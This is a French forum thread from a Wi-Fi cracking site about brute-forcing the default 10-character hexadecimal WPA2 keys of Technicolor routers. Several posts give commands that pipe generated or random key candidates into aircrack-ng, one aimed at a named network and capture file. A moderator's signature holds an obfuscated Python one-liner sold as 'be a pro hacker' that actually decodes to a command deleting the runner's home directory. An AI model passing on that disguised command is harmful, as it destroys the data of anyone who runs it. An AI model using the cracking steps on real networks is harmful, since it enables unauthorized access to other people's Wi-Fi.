Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-04-2014 20:33:36

Be0wulf
Membre
Inscription : 26-03-2014
Messages : 18

[Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Bonjour,

Après une petite enquête sur ce fameux Technicolor TD5130, j'ai trouvé que les mots de passe générés par défaut contenaient des caractères hexadécimales à 10 caractères et la plus part des gens se sentent plus-ou-moins sécurisés (y compris moi même). J'ai essayé avec crunch malheureusement cela prenait beaucoup trop de temps et d'espace à savoir 11To et quelque sous.

Crunch will now generate the following amount of data: 12094627905536 bytes
11534336 MB
11264 GB
11 TB
0 PB
Crunch will now generate the following number of lines: 1099511627776

Un peu de temps plus j'ai su en l’existence d'une technique (générer les hash pre-computés des mots de passe en les associant avec le eSSID ) qui réduisait exagérément le temps voir de 4h à à quelque secondes. Ma question est comment générer des listes moins volumineuse et plus rapidement ? Est ce un problème de matériel ? Est ce par faute de machine virtuelle ? j'ai aussi trouver que la carte graphique affectait la vitesse combinaison par seconde tandis que la génération de hash pour le processeur. En ce qui concerne ma modeste configuration j'ai un processeur i7 2Ghz pour notebook et une carte graphique Nvidia GeForce GT 640 LE.

Merci pour votre attention.

Dernière modification par Be0wulf (05-04-2014 22:10:55)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-04-2014 21:27:28

johny12
Membre Indéboulonnable
Inscription : 08-08-2011
Messages : 119
Site Web

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Il me semble que tu mélanges quelques sujets je vais tenter de t'y faire voir plus clair :

La seule chose (intéressante) que tu peux intercepter avec une carte wifi, c'est lorsque le client se connecte au réseau wifi
A ce moment là, le client envoie un "handshake" au wifi, qui (en gros) va, ou non, lui permettre de se connecter ou non

Le problème est que ce handshake est différent à chaque connexion, et ça vient de la manière dont il est fait :
Le mot de passe (que tu cherches donc) est hashé (passé à un algorithme) et il en sort le handshake

Le problème est que cet algorithme est irréversible
Le seul moyen pour retrouver la clé initiale est donc d'essayer différents mots de passe, de les passer à l'algol, et de voir si le résultat est le même qui celui que tu as récupéré lors de la connexion d'un autre client

L'algorithme :
Il tient compte de (en gros) : mot de passe + nom du routeur + d'autres paramètres

Donc à partir du handshake, le seul moyen est de bruteforcer différents mots de passe

Ce qui se résume à :
Prendre un dictionnaire de mot
Lui appliquer l'algorithme
Comparer les mots passés à l'algorithme à celui récupéré en wifi

Il faut donc :
Un gros dictionnaire ( en espérant qu'il contienne le mot de passe )
Une grosse puissance de calcul ( l'algorithme est appliqué à chaque mot, et est assez gourmands en ressource )

Tu peux donc, pour gagner du temps:
Utiliser des tables précaclulées, qui contiennent les mots de passe passé à l'algo -> tu évites de calculer l'algol pour chaque mot
Utiliser ta carte graphique pour effectuer l'algo -> accélère le processus

Du coup est ce que tu as encore des questions ?


Fondateur de johnyhack.ddns.net, co-admin de machack.fr,  et  dirigeant du défunt mac-hack.forumactif.com

Hors Ligne

#3 05-04-2014 21:53:16

Be0wulf
Membre
Inscription : 26-03-2014
Messages : 18

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Quand j'ai parlé d'un mot de passe hexadécimal à 10 caractères, je ne faisais aucune référence au handshake. Les mots de passe (les clés WPA2) sont littéralement du genre: F6A8C82AB0   
Le problème c'est qu'il faut crée une table pré-calculée pour chaque nom de routeur différent mais là on a même pas encore de support à passer à cowpatty et genpmk, le dictionnaire, qui est pratiquement irréalisable sans oublier le temps de génération de table personnalisée. Donc ma question, un dictionnaire hexadécimal à 10 caractères est ce possible ? Si oui, est-il possible de générer une table pré-calculer à partir de ce dernier ?

Merci

Dernière modification par Be0wulf (05-04-2014 21:58:57)

Hors Ligne

#4 05-04-2014 22:04:18

johny12
Membre Indéboulonnable
Inscription : 08-08-2011
Messages : 119
Site Web

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Oui c'est possible, mais ça prendra :
-Une place énorme
-Un coût calcul énorme
-Un temps énorme

Donc je suis pas certain que ça en vaille le coup.
Dans tous les cas, ça dépendra de si tu as de la chance ou non.
Avec de la chance : Le premier mot de passe sera le bon -> temps estimé : 1 seconde
Avec pas de chance : Le dernier mot de passe sera le bon -> temps estimé : 10+ ans


Fondateur de johnyhack.ddns.net, co-admin de machack.fr,  et  dirigeant du défunt mac-hack.forumactif.com

Hors Ligne

#5 05-04-2014 22:10:20

Be0wulf
Membre
Inscription : 26-03-2014
Messages : 18

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Dans ce cas, je pense que je laisserais tomber et attendre que quelqu'un trouve une faille ou même l'algorithme, vu que j'ai ni le temps ni les ressources. Merci de m'avoir accompagné.

Hors Ligne

#6 06-04-2014 10:51:33

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Tu n'as pas besoin de ressources.

Une fois que tu as un handshake, tu n'as pas à utiliser un dictionnaire de 11To.
C'est au-delà de l'absurde.

J'ai fait un outil qui te permet de générer «à la volée» les pass qui t'intéressent : https://github.com/qolund/derp/tree/mas … ern-walker

Celui-ci est plus rapide que crunch (pour beaucoup de raisons) et te permettra de piper directement aircrack :

./pattern-walker HEXA 10
0000000000
0000000001
0000000002
...

Fais gaffe, tu as 40 bits à bruteforcer (5 octets, 10 nibbles, 1099511627776 possibilités).
Pour faire sauter du WEP 40 bits, j'en ai pour une nuit sur 40 pc. (il ne s'agit que de faire un petit début de rc4 sur un petit paquet et de comparer.)
Là, tu as l'authentification du WPA dans la tronche, du PBKDF2 bien long avec un SHA1 bien gros.

Je suis intéressé par le timing que tu calculeras (:


time ./pattern-walker HEXA 6 | wc -l
16777216

real	0m1.201s
user	0m1.304s
sys	0m0.068s
time ./pattern-walker HEXA 7 | wc -l
268435456

real	0m19.352s
user	0m21.260s
sys	0m0.828s

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 06-04-2014 14:17:23

Be0wulf
Membre
Inscription : 26-03-2014
Messages : 18

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

Au début c'était intéressant, j'ai testé ton outil, plus rapide que crunch au niveau de la génération. Malheureusement, en l'associant avec aircrack-ng le résultat était le même avec une vitesse moyenne de 750 clé par seconde (47 années). J'ignore si je devrais démarrer BT depuis une clé usb, installer les drivers pour Nvida, à fin d'utiliser les ressources GPU sachant que ma carte graphique est dotée du processeur CUDA. Je crois pas aussi que je pourrais loué un cybercafé pour une nuit tongue

merci pour votre aide.

Hors Ligne

#8 16-04-2014 11:59:11

aiderlemonde
N00b
Inscription : 16-04-2014
Messages : 1

Re : [Résolu] Génération d'un dictionnaire hexadécimale à 10 caractères

voila un truc pas trop mal

ces aircrack avec un generateur de cle 10 caractere

xxd -c 5 -u -ps /dev/urandom | aircrack-ng -e Bbox-A9C737 -w - monfichier.cap

ne pas oblier les espace apres le "-"
pas de disco en directe
voila

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
10 1003 20-11-2016 03:13:07 par richie
13 442 20-11-2016 02:42:37 par richie
8 730 06-10-2016 19:49:01 par X-Ecutioner
0 611 10-09-2016 13:21:28 par Hume974
5 1854 13-07-2016 15:56:51 par jaues007

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]